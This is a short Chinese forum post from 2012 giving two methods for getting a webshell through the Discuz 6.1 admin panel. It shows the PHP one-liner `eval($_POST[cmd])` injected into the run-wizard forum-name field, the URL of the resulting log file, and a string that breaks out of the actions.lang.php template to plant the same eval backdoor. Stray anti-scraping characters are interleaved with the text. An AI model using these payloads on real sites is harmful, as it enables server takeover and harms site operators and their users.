discuz6.1两种方法后台拿shell8 {2 U* {7 C% {$ N/ ?" I; r
好多朋友说discuz6.1后台不会拿shell,在前段时间这些都是说不公布的东西,我发出来给大家测试一下% \ J% E. F4 M7 P! \" R
1:
0 Q s8 H% T7 F* jhttp://127.0.0.1/discuz/admincp. ... zard&frames=yes! Y4 Z$ [: U. v! F, B. m9 y0 \. r
admincp.php?action=runwizard&frames=yes点击下一步然后再论坛名称的地方插入webshell
9 A+ m: |: C7 ]3 A5 o- U3 w<?php eval($_POST[cmd]);?>! f6 R9 C1 g5 k, Z4 v! h
后台webshell地址:http://127.0.0.1/discuz/forumdata/logs/runwizardlog.php
3 i. j" m) X4 \+ H/ n9 l8 R* T/ `: T2 ^: e
( j8 ^% @5 f# Q: Z2:后台模板管理--默认模板套系--详情/ v3 D# d0 Z4 P8 N; J+ J/ }
templates/default/actions.lang.php
' i8 I/ v2 I3 Z. `! \jhackj\\');eval($_POST[cmd])?>;//
' r6 W1 ?1 r! _' Z( N0 H
) r& h* N& {8 x4 H9 X利用很简单,聪明的人一看就懂了 |
发表于 2012-9-13 16:59:17
收藏
支持
反对